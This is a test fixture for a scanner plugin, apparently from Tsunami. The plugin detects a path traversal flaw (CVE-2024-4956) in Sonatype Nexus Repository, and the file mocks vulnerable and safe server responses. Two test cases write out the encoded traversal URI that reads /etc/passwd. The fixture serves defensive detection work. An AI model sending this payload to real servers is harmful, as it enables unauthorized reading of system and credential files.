# proto-file: proto/templated_plugin_tests.proto
# proto-message: TemplatedPluginTests

config: {
  tested_plugin: "Nexus_CVE_2024_4956"
}

tests: {
  name: "whenVulnerable_returnsTrue"
  expect_vulnerability: true

  mock_callback_server: {
    enabled: false
    has_interaction: false
  }

  mock_http_server: {
    mock_responses: [
      {
        uri: "/"
        status: 200
        body_content: "<title>Sonatype Nexus Repository</title>something"
      },
      {
        uri: "/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
        status: 200
        body_content: "root:x:0:0:root:/root:/bin/bash"
      }
    ]
  }
}

tests: {
  name: "whenNotVulnerable_invalidLoginRejected_returnsFalse"
  expect_vulnerability: false

  mock_callback_server: {
    enabled: false
    has_interaction: false
  }

  mock_http_server: {
    mock_responses: [
      {
        uri: "/"
        status: 200
        body_content: "<title>Sonatype Nexus Repository</title>something"
      },
      {
        uri: "/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
        status: 200
        body_content: ""
      }
    ]
  }
}

tests: {
  name: "whenNotNexus_returnsFalse"
  expect_vulnerability: false

  mock_callback_server: {
    enabled: false
    has_interaction: false
  }

  mock_http_server: {
    mock_responses: [
      {
        uri: "/"
        status: 200
        body_content: "<title>Hello World</title>something"
      },
      {
        uri: "TSUNAMI_MAGIC_ANY_URI"
        status: 200
        body_content: "Hello world"
      }
    ]
  }
}
